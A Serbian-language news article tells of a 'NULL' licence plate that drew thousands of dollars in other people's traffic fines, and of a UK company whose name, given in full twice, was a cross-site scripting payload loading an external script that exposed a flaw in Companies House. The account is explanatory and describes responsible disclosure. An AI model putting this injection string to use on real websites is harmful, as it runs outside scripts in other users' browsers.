Možda ste već čuli kako je jedan Amerikanac prošle godine pokušao da "hakuje" sistem koji beleži kazne za saobraćajne prekršaje tako što je za registracionu tablicu svojeg automobila odabrao natpis NULL.
Smatrao je da će, ako ga saobraćajne kamere snime u prekršaju, ovaj zapis protumačiti kao prazno polje u bazi podataka i da tako neće dobiti kaznu. Ali, prevario se – sistem je upravo njemu pripisao sve saobraćajne prekršaje koji su u policijskoj bazi imali NULL zapis (zbog lošeg automatskog očitanja registracije, na primer), pa je u kratkom vremenu prikupio oko 12.000 dolara tuđih saobraćajnih kazni.
Slična sudbina zatekla je nedavno i Britanca koji je u šali svoju kompaniju nazvao koristeći HTML tagove: “><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD. Ovakvo ime, smatrao je, biće zabavno za njegovu konsultantsku kompaniju, ali nije ni slutio da bi time mogao da ugrozi britanski registar kompanija Companies House.
Ova organizacija je, naime, bila podložna hakerskom napadu na web aplikacije poznatome kao cross-site scripting. Unos ovog neobičnog imena malenog preduzeća u bazu podataka otvorio je web tog registra napadačima koji su potom mogli da iskoriste propust i na njihovom webu aktivirati spoljne (potencijalno opasne) HTML skripte.
Propust je otkrio sam vlasnik sporne kompanije, i odmah potom je obavestio kako spomenuti nacionalni registar, tako i službe nadležne za cyber bezbednost i održavanje digitalnih usluga Ujedinjenog Kraljevstva. Nakon što je potvrđeno da ime “><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD može da prouzrokuje bezbednosne probleme, registar Companies House naredio je da se ono odmah promeni. Poručili su pritom i da su preduzeli korake da ovakve skripte u budućnosti ne mogu da dovedu njihov registar u opasnost od hakovanja.
Vlasnik kompanije problematičnog imena odlučio je da ga promeni, ne odustajući od svoje šale, u: THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD (Ona kompanija čije ime je sadržalo tagove HTML skripte d.o.o.).
Postavi komentar
Vaš komentar: